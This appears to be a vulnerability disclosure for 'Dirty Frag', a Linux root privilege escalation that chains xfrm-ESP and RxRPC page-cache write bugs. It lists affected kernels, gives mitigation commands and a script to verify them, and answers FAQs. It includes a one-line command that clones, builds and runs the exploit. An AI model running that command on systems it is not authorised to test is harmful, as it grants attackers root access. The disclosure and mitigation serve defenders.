Dirty Frag: Universal Linux LPE
Source: Hacker News
Abstract

This document describes the Dirty Frag vulnerability class, first discovered and reported by Hyunwoo Kim (@v4bel). It can obtain root privileges on major Linux distributions by chaining the xfrm‑ESP Page‑Cache Write vulnerability and the RxRPC Page‑Cache Write vulnerability.
Dirty Frag extends the bug class that includes Dirty Pipe and Copy Fail. Because it is a deterministic logic bug that does not depend on a timing window, no race condition is required, the kernel does not panic when the exploit fails, and the success rate is very high.
For detailed technical information and the timeline, see the write‑up.
Note (2026‑05‑08)
- The xfrm‑ESP Page‑Cache Write vulnerability has been assigned CVE‑2026‑43284 and patched in mainline at commit f4c50a4034e6.
- The RxRPC Page‑Cache Write vulnerability has been reserved as CVE‑2026‑43500 for tracking; no patch exists in any tree yet.
Exploiting
One‑line special
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
This PoC is provided as accurate information following consultation with linux‑distros. Do not use it on systems that you are not authorized to test.
Cleanup
⚠️ Important: After running this exploit, the page cache is contaminated. To clear the polluted page cache and ensure system stability, either run:
echo 3 > /proc/sys/vm/drop_caches
or simply reboot the system.
Affected Versions
The xfrm‑ESP Page‑Cache Write vulnerability is in scope from commit cac2661c53f3 (2017‑01‑17) up to upstream, and the RxRPC Page‑Cache Write vulnerability is in scope from commit 2dc334f1a63a (2023‑06) up to upstream.
In other words, the effective lifetime of the vulnerabilities is about 9 years.
Dirty Frag has been tested on the following distribution versions:
- Ubuntu 24.04.4: 6.17.0-23-generic
- RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
- openSUSE Tumbleweed: 7.0.2-1-default
- CentOS Stream 10: 6.12.0-224.el10.x86_64
- AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
- Fedora 44: 6.19.14-300.fc44.x86_64
- … (additional versions omitted for brevity)
Mitigation
Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution at the moment. Use the following steps to remove the vulnerable modules and clear the page cache:
# Prevent the modules from loading
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf
# Unload them if they are already loaded
rmmod esp4 esp6 rxrpc 2>/dev/null || true
# Drop caches
echo 3 > /proc/sys/vm/drop_caches
Once each distribution backports a patch, update accordingly.
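As an added example (not code from the dirtyfrag repository), the following POSIX shell script verifies that the mitigation above is actually in place: it reports which of esp4, esp6 and rxrpc are still loaded and which are not yet blocked by an `install <module> /bin/false` line. The /proc/modules and /etc/modprobe.d paths are parameters so the checks can also be run against constructed sample files.

```shell
#!/bin/sh
# Added example: verify the Dirty Frag module mitigation (not part of the PoC repo).
# Note: blocking esp4/esp6 also disables kernel IPsec ESP; confirm it is unused first.

DIRTYFRAG_MODULES="esp4 esp6 rxrpc"

# Print the Dirty Frag-relevant modules that appear in a /proc/modules-style file.
# Each /proc/modules line begins with "<name> <size> ...".
loaded_vuln_modules() {
    modules_file="${1:-/proc/modules}"
    for m in $DIRTYFRAG_MODULES; do
        if grep -q "^$m " "$modules_file" 2>/dev/null; then
            printf '%s\n' "$m"
        fi
    done
}

# Print the modules that have NO "install <mod> /bin/false" line in any
# .conf file under the given modprobe.d directory (i.e. can still be loaded).
unblocked_vuln_modules() {
    modprobe_dir="${1:-/etc/modprobe.d}"
    for m in $DIRTYFRAG_MODULES; do
        if ! grep -Eqs "^[[:space:]]*install[[:space:]]+$m[[:space:]]+/bin/false" \
                "$modprobe_dir"/*.conf; then
            printf '%s\n' "$m"
        fi
    done
}

# Exit 0 only when nothing is loaded and every module is blocked.
dirtyfrag_mitigated() {
    [ -z "$(loaded_vuln_modules "$1")" ] && [ -z "$(unblocked_vuln_modules "$2")" ]
}

# Stand-alone report against the live system (harmless, read-only).
if dirtyfrag_mitigated; then
    echo "Dirty Frag mitigation in place"
else
    echo "Still loaded:  $(loaded_vuln_modules | tr '\n' ' ')"
    echo "Not blocked:   $(unblocked_vuln_modules | tr '\n' ' ')"
fi
```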
FAQ
Why did you chain two vulnerabilities?
xfrm‑ESP Page‑Cache Write provides a powerful arbitrary 4‑byte STORE primitive (similar to Copy Fail) and is present on most distributions, but it requires the privilege to create a user namespace. Ubuntu sometimes blocks unprivileged user namespace creation via AppArmor, preventing the exploit.
RxRPC Page‑Cache Write does not require namespace creation, but the rxrpc.ko module is not included in most distributions. However, on Ubuntu the rxrpc.ko module is loaded by default.
Chaining the two primitives covers each other’s blind spots, allowing root privileges to be obtained on every major distribution. See the technical details document for a deeper explanation.
Another “branded” “Dirty” series?
Yes. This vulnerability is a descendant of Dirty Pipe, and it “dirties” the frag member of struct sk_buff. The name Dirty Frag therefore reflects its lineage.
What is its relationship with the “Copy Fail” vulnerability?
Copy Fail inspired this research. The xfrm‑ESP Page‑Cache Write primitive in the Dirty Frag chain shares the same sink as Copy Fail. Unlike Copy Fail, it is triggered regardless of whether the algif_aead module is present. Consequently, even systems that have applied the public Copy Fail mitigation (blacklisting algif_aead) remain vulnerable to Dirty Frag.
So, how do I fix my Linux?
Refer to the Mitigation section above and the Disclosure Timeline. Because the embargo has been broken, no official patches are available yet for any distribution. Keep an eye on upstream updates and apply them as soon as they are released.